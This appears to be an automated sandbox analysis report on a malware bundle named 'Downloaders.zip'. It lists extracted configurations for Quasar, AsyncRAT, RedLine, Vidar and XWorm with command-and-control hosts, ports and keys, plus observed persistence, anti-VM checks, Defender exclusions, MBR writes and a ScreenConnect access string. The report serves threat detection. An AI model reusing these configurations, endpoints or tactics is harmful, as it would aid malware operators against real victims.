Resubmissions
05-02-2025 05:35
250205-gabxfatmcq 1003-02-2025 03:04
250203-dkkqjszkhq 1003-02-2025 02:21
250203-cs7plsylfr 1003-02-2025 02:20
250203-csf7nawqbz 1002-02-2025 21:21
250202-z7mdjsylhx 302-02-2025 18:40
250202-xbfvsawpaq 1002-02-2025 18:19
250202-wyncpstlfw 1024-01-2025 01:23
250124-br1z1asnhz 1024-01-2025 00:12
250124-ag75wssjak 1028-11-2024 02:19
241128-cr9sks1kht 10Analysis
-
max time kernel
802s -
max time network
815s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-02-2025 05:35
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win11-20241007-en
Errors
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Malware Config
Extracted
quasar
1.4.0
Office04
microsoftsys.ddns.net:4782
67e0653d-eedf-4888-88ab-78e97eb2df27
-
encryption_key
23E5F6D22FEE1750D36544A759A48349B064BC34
-
install_name
PerfWatson1.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
KDOT
Extracted
quasar
1.4.1
Test
193.161.193.99:35184
67.205.154.243:35184
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
MS Build Tools
-
subdirectory
Microsoft-Build-Tools
Extracted
quasar
1.4.1
Sigorta
0.0.0.0:7777
13.48.129.198:7777
172.31.0.240:7777
3b0592fc-14a1-4b8e-9803-69284ea2b6d2
-
encryption_key
E0BB4B221F7AADA73B9059B33A3CFF096A518413
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
vidar
https://t.me/sok33tn
https://steamcommunity.com/profiles/76561199824159981
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
redline
letsgo
45.67.231.189:29738
-
auth_value
3ad9a91465fa623a2f1ebd7f46ad2e47
Extracted
asyncrat
AsyncRAT
test
otrodia8912.gleeze.com:3333
123
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
0.tcp.in.ngrok.io:18220
HyFTucy74RnH
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Extracted
redline
news
45.144.28.250:26912
-
auth_value
e61921786ce9e1a6b356c82b24803f6d
Extracted
xworm
45.141.26.234:7000
0.tcp.in.ngrok.io:15792
91.92.249.37:9049
-
Install_directory
%ProgramData%
-
install_file
Java Update(32bit).exe
Extracted
quasar
1.4.0.0
Office
45.87.154.103:4782
45.87.154.103:5552
xPl9J65qwy6F7knuP1
-
encryption_key
4LFQYlAO6OyQ4AmLb0N7
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
sigorta
18.198.25.148:1604
af7e773d-541a-46fd-87d3-06bb0a26aab9
-
encryption_key
D306945220105109C86E6E257D749CE885E76091
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
bot
wexos47815-61484.portmap.host:61484
06e2bb33-968c-4ca7-97dc-f23fbd5c3092
-
encryption_key
8924CB3C9515DA437A37F5AE598376261E5528FC
-
install_name
msinfo32.exe
-
log_directory
Update
-
reconnect_delay
3000
-
startup_key
Discordupdate
-
subdirectory
dll32
Extracted
xworm
5.0
me-work.com:7008
6WiNy50p5NrI46Pe
-
install_file
USB.exe
Signatures
-
Asyncrat family
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/files/0x0002000000025ccf-2132.dat family_vidar_v7 behavioral1/memory/6368-2142-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/6368-2258-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 10 IoCs
resource yara_rule behavioral1/memory/14248-2420-0x0000000000E60000-0x0000000000E7E000-memory.dmp family_xworm behavioral1/files/0x000d000000028dd6-2522.dat family_xworm behavioral1/memory/6860-2534-0x00000000001E0000-0x00000000001F6000-memory.dmp family_xworm behavioral1/memory/6852-23412-0x0000000000B20000-0x0000000000B3E000-memory.dmp family_xworm behavioral1/memory/11428-25390-0x00000000006A0000-0x00000000006B6000-memory.dmp family_xworm behavioral1/files/0x0007000000000693-25492.dat family_xworm behavioral1/memory/10876-25750-0x0000000000BD0000-0x0000000000BEE000-memory.dmp family_xworm behavioral1/memory/11388-25800-0x0000000000E70000-0x0000000000E86000-memory.dmp family_xworm behavioral1/memory/5452-26050-0x0000000000BC0000-0x0000000000BD0000-memory.dmp family_xworm behavioral1/files/0x005000000002ac07-45986.dat family_xworm -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Kkxmzkdda\\Ifwwnw.exe\"," Proxifier.exe -
Nanocore family
-
Quasar family
-
Quasar payload 37 IoCs
resource yara_rule behavioral1/files/0x0006000000025b29-1255.dat family_quasar behavioral1/memory/12196-1311-0x00000000005A0000-0x00000000008C4000-memory.dmp family_quasar behavioral1/memory/10128-2116-0x0000000000FC0000-0x00000000012E4000-memory.dmp family_quasar behavioral1/memory/6696-2124-0x0000000000510000-0x0000000000834000-memory.dmp family_quasar behavioral1/memory/14292-2421-0x0000000000400000-0x000000000044E000-memory.dmp family_quasar behavioral1/memory/6660-9949-0x0000000000400000-0x000000000044E000-memory.dmp family_quasar behavioral1/memory/14244-25789-0x0000000000580000-0x00000000008A4000-memory.dmp family_quasar behavioral1/files/0x000d00000000f4c6-26026.dat family_quasar behavioral1/memory/10196-26034-0x0000000000780000-0x0000000000AA4000-memory.dmp family_quasar behavioral1/memory/8648-26058-0x0000000000A10000-0x0000000000D34000-memory.dmp family_quasar behavioral1/memory/10752-26256-0x0000000000350000-0x0000000000674000-memory.dmp family_quasar behavioral1/files/0x001b00000002abb7-31344.dat family_quasar behavioral1/files/0x001f00000002ac1b-57486.dat family_quasar behavioral1/files/0x001900000002ac66-59628.dat family_quasar behavioral1/files/0x001900000002ac6c-59653.dat family_quasar behavioral1/files/0x001c00000002ac6d-59666.dat family_quasar behavioral1/files/0x001a00000002ac6f-59805.dat family_quasar behavioral1/files/0x001900000002ac8b-59823.dat family_quasar behavioral1/files/0x001900000002ac8c-60533.dat family_quasar behavioral1/files/0x001900000002ac94-61508.dat family_quasar behavioral1/files/0x001900000002ac96-62129.dat family_quasar behavioral1/files/0x001900000002ac99-62574.dat family_quasar behavioral1/files/0x001900000002aca3-63030.dat family_quasar behavioral1/files/0x001900000002aca4-63065.dat family_quasar behavioral1/files/0x001900000002acae-63118.dat family_quasar behavioral1/files/0x001900000002acb6-63166.dat family_quasar behavioral1/files/0x001900000002acc2-63232.dat family_quasar behavioral1/files/0x001900000002acc3-63290.dat family_quasar behavioral1/files/0x001900000002acc9-63356.dat family_quasar behavioral1/files/0x001c00000002accd-63408.dat family_quasar behavioral1/files/0x001900000002acd2-63424.dat family_quasar behavioral1/files/0x001900000002acd4-63470.dat family_quasar behavioral1/files/0x001a00000002ac92-63498.dat family_quasar behavioral1/files/0x001a00000002acdb-63590.dat family_quasar behavioral1/files/0x001e00000002acdf-63617.dat family_quasar behavioral1/files/0x001b00000002ace1-63664.dat family_quasar behavioral1/files/0x001b00000002acea-63695.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/7472-2149-0x0000000000400000-0x0000000000436000-memory.dmp family_redline behavioral1/memory/14188-2407-0x0000000000400000-0x0000000000446000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 4528 created 3268 4528 DevMI.exe 52 PID 4528 created 3268 4528 DevMI.exe 52 PID 4528 created 3268 4528 DevMI.exe 52 PID 4528 created 3268 4528 DevMI.exe 52 PID 4528 created 3268 4528 DevMI.exe 52 PID 4528 created 3268 4528 DevMI.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 PID 5792 created 3268 5792 updaters.exe 52 -
Vidar family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0002000000025ff1-2209.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ _ovvtLvn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mokajotabet.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vbc.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions Muikfjd.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 12080 powershell.exe 11800 powershell.exe 11392 powershell.exe 14692 powershell.exe 11224 powershell.exe 11784 powershell.exe 9044 powershell.exe 8980 powershell.exe 2776 powershell.exe 5912 powershell.exe 9612 powershell.exe 13956 powershell.exe 2500 powershell.exe 5044 powershell.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 36 1508 New Text Document mod.exe 96 564 4363463463464363463463463.exe 209 1508 New Text Document mod.exe 34 564 4363463463464363463463463.exe 34 564 4363463463464363463463463.exe 34 564 4363463463464363463463463.exe 216 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 7 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 38 1508 New Text Document mod.exe 9 1508 New Text Document mod.exe 9 1508 New Text Document mod.exe 9 1508 New Text Document mod.exe 9 1508 New Text Document mod.exe 73 1508 New Text Document mod.exe 93 1508 New Text Document mod.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts DevMI.exe File created C:\Windows\System32\drivers\etc\hosts updaters.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools Muikfjd.exe -
Modifies Windows Firewall 2 TTPs 29 IoCs
pid Process 732 netsh.exe 7820 netsh.exe 6728 netsh.exe 11932 netsh.exe 9204 netsh.exe 5152 netsh.exe 14096 netsh.exe 2912 netsh.exe 14544 netsh.exe 11584 netsh.exe 13932 netsh.exe 10468 netsh.exe 14736 netsh.exe 13168 netsh.exe 6396 netsh.exe 7724 netsh.exe 7296 netsh.exe 9140 netsh.exe 13076 netsh.exe 9668 netsh.exe 14688 netsh.exe 2764 netsh.exe 11976 netsh.exe 7152 netsh.exe 10616 netsh.exe 10396 netsh.exe 7336 netsh.exe 9384 netsh.exe 7440 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 7176 attrib.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73a0227d089fe193)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=adminxyzhosting.com&p=8041&s=fc9a36f6-0b08-4c34-9329-6be5ce396fa4&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAXPgbJcA%2bTEWa%2b3Tn5c1hcAAAAAACAAAAAAAQZgAAAAEAACAAAACUknjXVlS8Kqk%2fI8m7Es7wWDeamgSmR%2b4yRlmqwpRjnwAAAAAOgAAAAAIAACAAAABqfuI6Z6Gb495G5JgCm%2fY4OaMxZfnfC5WemZcEI4SooqAEAABqkMXpIZnVumf5WTL4f2UpJoo%2fPRjDftiema1CCzmkxiPymDmkxm55k8wgB6ABnXFJ7NO4Iyj0xJTFD1neiTCVR%2bBYShhfpY5d3%2fbyCUkySha9L3zf9nOEVm5ttO6E557PVscJG0%2b2NXgBWdxDJtzXvBS7nV6NZpL67YdXX3CCW6zNDvo9qecsgSBXpqNLL9bkOlu3TlWVdF1d3jbADY%2feA4GgcwbZu8PyrUIweufabWCG73deVRnwfC5ypaHiOJE2OVU1%2b8pWJefPM71R1rF2%2bayR8x64c9Cl8cge30zGrXGigZbd7ryZMZLE31fdU%2ffqMmRDmVq3JHqbAWJLYgGbeWleFsgMhqzkU2gTrRKncDe62EwcuSHvqHeNCrziHtEt6sd3LjXuoy3Dp0rEyry%2bPKaLvRKf0%2bdGnsEDSt9StwK2gEWchQ%2fwhKGclspbRANF37y6ZJXKkRULoq00wdfpdMkfULa%2bv%2fFLODEQ3zcjn%2fJ3cajpr6HF5mwasDe6SwKobWRBAOSkPILXXyI%2fQkjbSvc5%2fY8gt9mnxxnKpnF51KOgV025gaV%2f3I%2bd5QcgBsaOwjHRIn%2bQnBvES07yrzLEXPwd0g0cnAGXl%2f7N%2fe3nYR1faNEchcauVXe7w%2f%2bWMRelV33uWMXe7mFyY0bgkiei%2fsjQRFNpQgyxm%2fArM%2buvVi%2fe92%2bBDcsVn3FfrFMe4gL%2bIPqVnnnMxPFHPNmA0PiG82BE0Az6CUvM0n8jjhGFLcZUpHGJuzRhiTAw2cLawTPQKpp0kBIKjXXmMyNhjnes4jSePleiihbP9D7sVVBFoiA4eWWMm%2bAKIb6wFqU87JOs2kkjQVJVOOk8PwGNr5%2bdRatX9C865RLLNFXStE6YLtzSoGmXAHK76hY2%2bViEm15eXEuR0bBgtNS7sW1z9lVDuyiZgNkCGof28pCbIDzU0QWrII9dJ5JN6NEA0za3PoM%2bO1n62fbgVLOKOB%2b6MBig6kWPrlRSGzB6n%2fJ32RnhwNDCfVokrRy37DgkYzeCnbpk6XsCKFxMAAMs%2bIVVwp8o3P3%2bttX5bhVPk%2b%2fBUVhDD5dtTYx2q0GyODaquQwosgiAvOG6QbwUmWSGcjvE3dB97QxmUiOp3%2bvK2xrcfTHLHcau1VFJLD2lgpuyUq2hvIltx%2bKeOQxjQ6ggIYpP9e1OTqB68QnVMjt2G1B136lMy3qrNWsffxDKCG1iXXz7E43j9bYSMZ2b4YMU4gK%2fYqP0mXzMrXpudHn6%2fppmDnKfSS7%2fp2IqiV5bJw8PX2rOnnxxVxE9vafTKx3ng%2fF8%2fWor22t8isGRTanSZBZO0%2fUrWfo5NTBsc3rNR9aZ3Kcdn02tXJ8USCACxsKnQVRqZew9NwTcGkW0FOOLaz3GcuvPEhfR2KBK8mpBTp%2bfdeJ9i1L7JhMjHQzyNeDJbEPnnynausSdpbLZRU07eKxByiwYdAKZUwobS6HWMTqnt8Jc77Zz4v24pLDE%2fnHPTJ1TSgO7gux%2fJZ7S8Qci7FCHJu%2bu4BMrZpeQWazfZmh6MuwNBTfNdIesWTsxEpkwDJYpHyOTIAKqAbfb1IFpAmAd9djVpkAAAAAU%2fNTrUNPJ3FiIEii8dGHVCShxntGbEfiepKjVKfmauaYQkeZdkHFsvvgDm%2br858BrCU%2f%2bMPkoKaIKj3EnO8FB&c=prv8&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dXJ2e_10896\ImagePath = "\\??\\C:\\Windows\\Temp\\dXJ2e_10896.sys" vbc.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mokajotabet.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate mokajotabet.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _ovvtLvn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _ovvtLvn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Muikfjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate _ovvtLvn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Muikfjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mokajotabet.exe -
Drops startup file 10 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe winX32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk 1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk 1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe first.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk winX32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk winX32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe winX32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wajohadon.url _ovvtLvn.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wajohadon.url _ovvtLvn.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe first.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 38 IoCs
pid Process 4528 DevMI.exe 1116 black.exe 832 purple.exe 3412 green.exe 4752 yellow.exe 380 CL.exe 5792 updaters.exe 2936 invoice.exe 7784 _ovvtLvn.exe 7900 Muikfjd.exe 12144 Proxifier.exe 12496 ffcr.exe 10128 Client-built.exe 6696 exacag.exe 6368 cjrimgid.exe 13252 discord.exe 9140 winX32.exe 9836 CPDB.exe 6208 Discord2.exe 9208 File.exe 8048 cHSzTDjVl.exe 9548 winX32.exe 6300 Discord.exe 12052 ScreenConnect.ClientService.exe 8500 ScreenConnect.WindowsClient.exe 11996 ScreenConnect.WindowsClient.exe 14188 Muikfjd.exe 14248 1.exe 9600 mokajotabet.exe 14604 XSploitLauncher.exe 6860 svchost.exe 12784 Loader.exe 14928 inst.exe 6852 Java Update(32bit).exe 11428 first.exe 2344 svc.exe 8468 zx.exe 4188 zx.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe -
Loads dropped DLL 26 IoCs
pid Process 6040 MsiExec.exe 5960 rundll32.exe 5960 rundll32.exe 5960 rundll32.exe 5960 rundll32.exe 5960 rundll32.exe 5960 rundll32.exe 5960 rundll32.exe 12196 built.exe 13796 MsiExec.exe 11748 MsiExec.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 12052 ScreenConnect.ClientService.exe 4188 zx.exe 4188 zx.exe 4188 zx.exe 4188 zx.exe 4188 zx.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" winX32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe" first.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\winX32.exe" winX32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" winX32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" winX32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Update(32bit) = "C:\\ProgramData\\Java Update(32bit).exe" 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\svсhost = "C:\\Users\\Admin\\AppData\\Roaming\\svсhost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " CL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DOS Monitor = "C:\\Program Files (x86)\\DOS Monitor\\dosmon.exe" discord.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" winX32.exe -
Checks whether UAC is enabled 1 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _ovvtLvn.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA discord.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mokajotabet.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs
flow ioc 1229 2.tcp.eu.ngrok.io 38 raw.githubusercontent.com 536 0.tcp.in.ngrok.io 15 raw.githubusercontent.com 903 6.tcp.eu.ngrok.io 1229 6.tcp.eu.ngrok.io 1229 0.tcp.eu.ngrok.io 669 raw.githubusercontent.com 705 0.tcp.in.ngrok.io 7 bitbucket.org 307 0.tcp.in.ngrok.io 975 0.tcp.in.ngrok.io 1229 0.tcp.in.ngrok.io 34 raw.githubusercontent.com 470 0.tcp.in.ngrok.io 874 0.tcp.in.ngrok.io 1029 2.tcp.eu.ngrok.io 874 2.tcp.eu.ngrok.io 975 0.tcp.eu.ngrok.io 2 bitbucket.org 98 0.tcp.in.ngrok.io 1029 6.tcp.eu.ngrok.io 529 raw.githubusercontent.com 705 2.tcp.eu.ngrok.io 15 0.tcp.in.ngrok.io 269 0.tcp.in.ngrok.io 916 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com 98 ip-api.com 1029 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Muikfjd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Muikfjd.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5724 powercfg.exe 5736 powercfg.exe 6068 powercfg.exe 1980 powercfg.exe 1740 cmd.exe 3832 powercfg.exe 3996 powercfg.exe 4152 cmd.exe 2060 powercfg.exe 1240 powercfg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 _ovvtLvn.exe File opened for modification \??\PhysicalDrive0 mokajotabet.exe -
Drops file in System32 directory 29 IoCs
